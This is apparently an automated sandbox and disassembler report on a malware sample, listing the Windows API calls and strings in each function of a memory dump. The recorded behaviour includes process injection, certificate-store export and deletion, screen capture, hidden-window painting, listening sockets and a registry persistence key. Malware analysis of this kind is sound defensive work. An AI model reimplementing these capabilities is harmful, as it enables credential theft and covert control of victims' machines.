SOFTWARE\Microsoft\Xyuxy, xrefs: 00047699

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003E89E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0003E8E0

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 0004768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 000476B3
Part of subcall function 0004768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 000476E2
Part of subcall function 0004768E: RegCloseKey.KERNEL32(?), ref: 00047702

Strings

Qanyodfyy, xrefs: 0003E8B7, 0003E8F2
SOFTWARE\Microsoft\Xyuxy, xrefs: 0003E8A7, 0003E8B2, 0003E8BE, 0003E8D9

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00046AAA, Relevance: 4.5, APIs: 3, Instructions: 41

APIs

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,000449F4,?,?,?,00042326,000000FF,00052C08), ref: 00046AC3
GetLastError.KERNEL32(?,?,000449F4,?,?,?,00042326,000000FF,00052C08,?,?,00000000), ref: 00046AC9

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,00000000,?,?,000449F4,?,?,?,00042326,000000FF,00052C08), ref: 00046AEF

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000449D2, Relevance: 4.5, APIs: 3, Instructions: 37

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,00042326,000000FF,00052C08,?,?,00000000), ref: 000449E2

Part of subcall function 00046AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,000449F4,?,?,?,00042326,000000FF,00052C08), ref: 00046AC3
Part of subcall function 00046AAA: GetLastError.KERNEL32(?,?,000449F4,?,?,?,00042326,000000FF,00052C08,?,?,00000000), ref: 00046AC9
Part of subcall function 00046AAA: GetTokenInformation.ADVAPI32(?,00000001,00000000,00000000,00000000,?,?,000449F4,?,?,?,00042326,000000FF,00052C08), ref: 00046AEF

GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,00042326,000000FF,00052C08), ref: 00044A0E

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

CloseHandle.KERNEL32(?), ref: 00044A23

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004763A, Relevance: 4.5, APIs: 3, Instructions: 36

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00049EAB,?,?,00000004), ref: 00047658
RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00049EAB,?,?,00049EAB,?,?,00000004,?,00000004), ref: 00047672
RegCloseKey.ADVAPI32(00000004,?,?,00049EAB,?,?,00000004,?,00000004), ref: 00047681

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00042BA3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83

APIs

Part of subcall function 000420C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00042105
Part of subcall function 000420C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00042172
Part of subcall function 000420C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 000421A7
Part of subcall function 000420C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 000421DB
Part of subcall function 000420C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 000421FA
Part of subcall function 000420C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 0004220C
Part of subcall function 000420C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 0004221E
Part of subcall function 000420C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 00042230
Part of subcall function 000420C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 00042242
Part of subcall function 000420C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 00042254
Part of subcall function 000420C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0004228D
Part of subcall function 000420C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 0004229C
Part of subcall function 000420C4: InitializeCriticalSection.KERNEL32(0005400C,?,?,00000000), ref: 000422C9
Part of subcall function 000420C4: WSAStartup.WS2_32(00000202,?), ref: 000422DF
Part of subcall function 000420C4: CreateEventW.KERNEL32(00052C30,00000001,00000000,00000000,?,?,00000000), ref: 00042300
Part of subcall function 000420C4: GetLengthSid.ADVAPI32(00000000,000000FF,00052C08,?,?,00000000), ref: 00042335
Part of subcall function 000420C4: GetCurrentProcessId.KERNEL32(00000000,011EF7D0,00000000,?,?,00000000), ref: 00042362

Part of subcall function 00042A32: CloseHandle.KERNEL32(00052AF0), ref: 00042AF2

Part of subcall function 0003E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00034E69,?,?,743C152E,00000002), ref: 0003E97F

CoInitializeEx.OLE32(00000000,00000002), ref: 00042C62

Part of subcall function 00049837: CoUninitialize.OLE32 ref: 00049845

Part of subcall function 0004D486: CertOpenSystemStoreW.CRYPT32(00000000,00034BBC,?,00000000,00000001), ref: 0004D4A1
Part of subcall function 0004D486: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 0004D4BD
Part of subcall function 0004D486: CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 0004D4C9
Part of subcall function 0004D486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0004D508
Part of subcall function 0004D486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0004D538
Part of subcall function 0004D486: CharLowerW.USER32 ref: 0004D556
Part of subcall function 0004D486: GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0004D561
Part of subcall function 0004D486: CertCloseStore.CRYPT32(?,00000000), ref: 0004D5EA

Part of subcall function 0004D5FB: CertOpenSystemStoreW.CRYPT32(00000000,00034BBC,?,00000001,00042C2A), ref: 0004D606
Part of subcall function 0004D5FB: CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,00042C2A), ref: 0004D61F
Part of subcall function 0004D5FB: CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00042C2A), ref: 0004D62A
Part of subcall function 0004D5FB: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,00042C2A), ref: 0004D632
Part of subcall function 0004D5FB: CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,00042C2A), ref: 0004D63E

Part of subcall function 0004A138: SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 0004A170

Strings

@, xrefs: 00042C99

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003E959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30

APIs

CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,00034E69,?,?,743C152E,00000002), ref: 0003E97F

Part of subcall function 0003E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0003E8E0

Part of subcall function 00046B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00046B0A
Part of subcall function 00046B07: CloseHandle.KERNEL32(00000000), ref: 00046B1C

Strings

Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 0003E95A, 0003E963, 0003E96C, 0003E977

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00049D6D, Relevance: 3.2, APIs: 2, Instructions: 172

APIs

InitializeCriticalSection.KERNEL32(00053F24,00000000,7718F8FF), ref: 00049D8F

Part of subcall function 00047595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00049E26,?,?), ref: 000475AD

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 00049E63

Part of subcall function 0004763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,00049EAB,?,?,00000004), ref: 00047658
Part of subcall function 0004763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,00049EAB,?,?,00049EAB,?,?,00000004,?,00000004), ref: 00047672
Part of subcall function 0004763A: RegCloseKey.ADVAPI32(00000004,?,?,00049EAB,?,?,00000004,?,00000004), ref: 00047681

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

Part of subcall function 00047711: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,00049E78,?), ref: 0004771E
Part of subcall function 00047711: RegCloseKey.KERNEL32(?), ref: 0004772E

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00041EE1, Relevance: 3.1, APIs: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00041F2C

Part of subcall function 00048C40: PathCombineW.SHLWAPI(00041F45,00041F45,?), ref: 00048C5F

lstrcmpiW.KERNEL32(?,?,?), ref: 00041F56

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00047607, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,00049E26,?,?,?,000475CD,?,?,00000000,00000004,?), ref: 0004761F
RegCloseKey.KERNEL32(?,?,000475CD,?,?,00000000,00000004,?,?,?,?,00049E26,?,?), ref: 0004762D

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00047711, Relevance: 3.0, APIs: 2, Instructions: 18

APIs

RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,00049E78,?), ref: 0004771E
RegCloseKey.KERNEL32(?), ref: 0004772E

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003BE3B, Relevance: 1.6, APIs: 1, Instructions: 62

APIs

VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,0003C160,00052360), ref: 0003BE72

Part of subcall function 0003BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,00000040,0003C160,00000000,00000000,00000004,?,?,0003C160,00052360), ref: 0003BD86
Part of subcall function 0003BD44: WriteProcessMemory.KERNEL32(000000FF,DB84D88A,?,35FFC690,00000000,?,?,0003C160,00052360), ref: 0003BD9C
Part of subcall function 0003BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,0003C160,0003C160,?,?,0003C160,00052360), ref: 0003BDB6

Part of subcall function 00047BF7: VirtualProtectEx.KERNELBASE(000000FF,0003C160,0000001E,00000040,00052360,0003C158,00000004,?,?,?,?,0003BE97,6A000523,00000000), ref: 00047C24
Part of subcall function 00047BF7: ReadProcessMemory.KERNELBASE(000000FF,0003C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,0003BE97,6A000523,00000000), ref: 00047C4B
Part of subcall function 00047BF7: WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 00047CC5
Part of subcall function 00047BF7: WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 00047CED
Part of subcall function 00047BF7: VirtualProtectEx.KERNELBASE(000000FF,0003C160,0000001E,00052360,00052360,?,?,?,?,0003BE97,6A000523,00000000,?,?,0003C160,00052360), ref: 00047D05

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00047595, Relevance: 1.5, APIs: 1, Instructions: 35

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00049E26,?,?), ref: 000475AD

Part of subcall function 00047607: RegQueryValueExW.KERNEL32(?,?,00000000,?,00049E26,?,?,?,000475CD,?,?,00000000,00000004,?), ref: 0004761F
Part of subcall function 00047607: RegCloseKey.KERNEL32(?,?,000475CD,?,?,00000000,00000004,?,?,?,?,00049E26,?,?), ref: 0004762D

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00042CBA, Relevance: 1.5, APIs: 1, Instructions: 22

APIs

Part of subcall function 00042BA3: CoInitializeEx.OLE32(00000000,00000002), ref: 00042C62

GetModuleHandleW.KERNEL32(00000000), ref: 00042CCB

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Non-executed Functions

Function 0004D486, Relevance: 12.1, APIs: 8, Instructions: 119

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00034BBC,?,00000000,00000001), ref: 0004D4A1
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 0004D4BD
CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 0004D4C9
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0004D508

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 0004D538
CharLowerW.USER32 ref: 0004D556
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0004D561

Part of subcall function 0004D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0004D581,?,?,00000000), ref: 0004D43F

Part of subcall function 000440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 000440CF

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

CertCloseStore.CRYPT32(?,00000000), ref: 0004D5EA

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0004D5FB, Relevance: 7.5, APIs: 5, Instructions: 36

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00034BBC,?,00000001,00042C2A), ref: 0004D606
CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,00042C2A), ref: 0004D61F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00042C2A), ref: 0004D62A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,00042C2A), ref: 0004D632
CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,00042C2A), ref: 0004D63E

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000464FD, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 00046506
bind.WS2_32(00000000,?,-0000001D), ref: 00046526
listen.WS2_32(00000000,?), ref: 00046535
#3.WS2_32(00000000,?,00034C21,7FFFFFFF,?,00000000,00000080), ref: 00046540

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000467DB, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 000467E4
bind.WS2_32(00000000,00000017,-0000001D), ref: 00046804
#3.WS2_32(00000000), ref: 0004680F

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 0003EA11, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 0003EA43
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0003EA54
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0003EA61
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0003EA6E
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0003EA7B
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0003EA88
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0003EA95
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0003EAA2
LoadLibraryA.KERNEL32(ole32.dll), ref: 0003EAEA
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0003EAF5
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0003EB07
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0003EB12
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0003EB1E
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0003EB2B
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0003EB38
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0003EB45
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0003EB52
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0003EB5F
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0003EB6C
LoadImageW.USER32(00000000,00007F00,00000002,00000000,00000000,00008040), ref: 0003EC10
GetIconInfo.USER32(00000000,?), ref: 0003EC25
GetCursorPos.USER32(?), ref: 0003EC33
DrawIcon.USER32(?,?,?,?), ref: 0003ED04

Part of subcall function 0004338B: HeapAlloc.KERNEL32(00000008,-00000004,00044B59,00000000,?,?,?,00041E08,00000000,000422ED,?,?,00000000), ref: 0004339C

lstrcmpiW.KERNEL32(?,-00000030), ref: 0003ED85

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

FreeLibrary.KERNEL32(00000000), ref: 0003EE9C
FreeLibrary.KERNEL32(?), ref: 0003EEA6
FreeLibrary.KERNEL32(00000000), ref: 0003EEB0

Strings

gdiplus.dll, xrefs: 0003EA25
gdi32.dll, xrefs: 0003EB02
CreateDCW, xrefs: 0003EB09
GdiplusShutdown, xrefs: 0003EA56
CreateStreamOnHGlobal, xrefs: 0003EAEC
BitBlt, xrefs: 0003EB47
GdipDisposeImage, xrefs: 0003EA70
GdipGetImageEncoders, xrefs: 0003EA8A
GdipGetImageEncodersSize, xrefs: 0003EA7D
GdipSaveImageToStream, xrefs: 0003EA97
CreateCompatibleBitmap, xrefs: 0003EB20
DeleteObject, xrefs: 0003EB54
GetDeviceCaps, xrefs: 0003EB2D
GdiplusStartup, xrefs: 0003EA4B
DeleteDC, xrefs: 0003EB61
DISPLAY, xrefs: 0003EBDE
SelectObject, xrefs: 0003EB3A
CreateCompatibleDC, xrefs: 0003EB14
ole32.dll, xrefs: 0003EAE5
GdipCreateBitmapFromHBITMAP, xrefs: 0003EA63

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 000354A9, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308

APIs

Part of subcall function 0003DCA2: GetClassNameW.USER32(002601CA,?,00000101), ref: 0003DCBD

GetWindowInfo.USER32(?,?), ref: 00035515
IntersectRect.USER32(?,?,-00000114), ref: 00035538
IntersectRect.USER32(?,?,-00000114), ref: 0003558E
GetDC.USER32(00000000), ref: 000355D2
CreateCompatibleDC.GDI32(00000000), ref: 000355E3
ReleaseDC.USER32(00000000,00000000), ref: 000355ED
SelectObject.GDI32(00000000,?), ref: 00035602
DeleteDC.GDI32(00000000), ref: 00035610
TlsSetValue.KERNEL32(?), ref: 0003565B
EqualRect.USER32(?,?), ref: 00035675
SaveDC.GDI32(00000000), ref: 00035680
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0003569B
SendMessageW.USER32(?,00000085,00000001,00000000), ref: 000356BB
DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 000356CD
RestoreDC.GDI32(00000000,?), ref: 000356E4
SaveDC.GDI32(00000000), ref: 00035706
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0003571C
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00035735
RestoreDC.GDI32(00000000,?), ref: 00035743
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00035756
SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00035766
DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00035778
TlsSetValue.KERNEL32(00000000), ref: 00035792
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 000357B2
DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 000357CE
SelectObject.GDI32(00000000,?), ref: 000357E4
DeleteDC.GDI32(00000000), ref: 000357EB
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00035813

Part of subcall function 000353C7: GdiFlush.GDI32 ref: 0003541E

PrintWindow.USER32(00000008,00000000,00000000), ref: 00035829

Strings

<, xrefs: 0003550B

Memory Dump Source

Source File: 0000000A.00000002.1648450848.00030000.00000040.sdmp, Offset: 00030000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30000_cmd.jbxd

Function 00042D01, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 243

APIs

Part of subcall function 000485D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 000485F5
Part of subcall function 000485D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00042D27,?,?,00000000), ref: 00048608
Part of subcall function 000485D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00042D27,?,?,00000000), ref: 00048630
Part of subcall function 000485D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00048648
Part of subcall function 000485D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00042D27,?,?,00000000), ref: 00048662
Part of subcall function 000485D0: CloseHandle.KERNEL32(?), ref: 0004866B

Part of subcall function 00048678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,0004C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 00048689
Part of subcall function 00048678: CloseHandle.KERNEL32(?), ref: 00048697

CreateMutexW.KERNEL32(00052C30,00000001,?,32901130,?,00000001,?), ref: 00042D91
GetLastError.KERNEL32 ref: 00042DA3
CloseHandle.KERNEL32(000001E6), ref: 00042DBA

Part of subcall function 0003E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 0003E8E0

Part of subcall function 000431CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000431ED
Part of subcall function 000431CC: Process32FirstW.KERNEL32(000001E6,?), ref: 00043216
Part of subcall function 000431CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 00043271
Part of subcall function 000431CC: CloseHandle.KERNEL32(00000000), ref: 0004328E
Part of subcall function 000431CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 000432A1
Part of subcall function 000431CC: CloseHandle.KERNEL32(?), ref: 0004330E
Part of subcall function 000431CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 0004331A
Part of subcall function 000431CC: CloseHandle.KERNEL32(000001E6), ref: 0004332B

ExitWindowsEx.USER32(00000014,80000000), ref: 00042DFD
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 00042E1C
SetEvent.KERNEL32(00000000), ref: 00042E29
CloseHandle.KERNEL32(00000000), ref: 00042E30

Part of subcall function 00042A32: CloseHandle.KERNEL32(00052AF0), ref: 00042AF2

CloseHandle.KERNEL32(000001E6), ref: 00042E42
ReadProcessMemory.KERNEL32(000000FF,00260014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 00042EA6
Sleep.KERNEL32(000001F4), ref: 00042EB8
IsWellKnownSid.ADVAPI32(011EF7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 00042EC9
ReadProcessMemory.KERNEL32(000000FF,00260014,00000000,00000001,00000000), ref: 00042EF1
GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 00042F0D
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 00042F50

Part of subcall function 000497D0: VirtualProtect.KERNEL32(0004CA1A,?,00000040,00000000,00260014,?,?,00042F6C,?,?), ref: 000497E5
Part of subcall function 000497D0: VirtualProtect.KERNEL32(0004CA1A,?,00000000,00000000,?,?,00042F6C,?,?), ref: 00049818

CreateEventW.KERNEL32(00052C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 00042FCE
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00042FE7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00042FF7
CloseHandle.KERNEL32(0000000C), ref: 0004300D
CloseHandle.KERNEL32(?), ref: 00043013
CloseHandle.KERNEL32(?), ref: 00043016

Part of subcall function 00046B8E: ReleaseMutex.KERNEL32(00000000,00043021,?,?,?), ref: 00046B92

Part of subcall function 0004D0E6: LoadLibraryW.KERNEL32(?), ref: 0004D107
Part of subcall function 0004D0E6: GetProcAddress.KERNEL32(00000000,?), ref: 0004D128
Part of subcall function 0004D0E6: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0004D159
Part of subcall function 0004D0E6: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0004D17C
Part of subcall function 0004D0E6: FreeLibrary.KERNEL32(00000000), ref: 0004D1A3
Part of subcall function 0004D0E6: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0004D1D9
Part of subcall function 0004D0E6: NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0004D212
Part of subcall function 0004D0E6: NetApiBufferFree.NETAPI32(?,?,?), ref: 0004D2AB
Part of subcall function 0004D0E6: NetApiBufferFree.NETAPI32(?), ref: 0004D2BE
Part of subcall function 0004D0E6: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0004D2E2

Part of subcall function 00044E20: CharToOemW.USER32(?,?), ref: 00044E35

Part of subcall function 00046B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,00042E87,?,19367401,?,00000001,8889347B,00000002), ref: 00046BA9
Part of subcall function 00046B9E: CloseHandle.KERNEL32(00000000), ref: 00046BB4

Part of subcall function 000433BB: HeapFree.KERNEL32(00000000,00000000,00044BB2), ref: 000433CE

Part of subcall function 00042507: CreateMutexW.KERNEL32(00052C30,00000000,?,?,?,?,?), ref: 00042528

Part of subcall function 0004CCCF: StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,011EF800,00000000), ref: 0004CD57
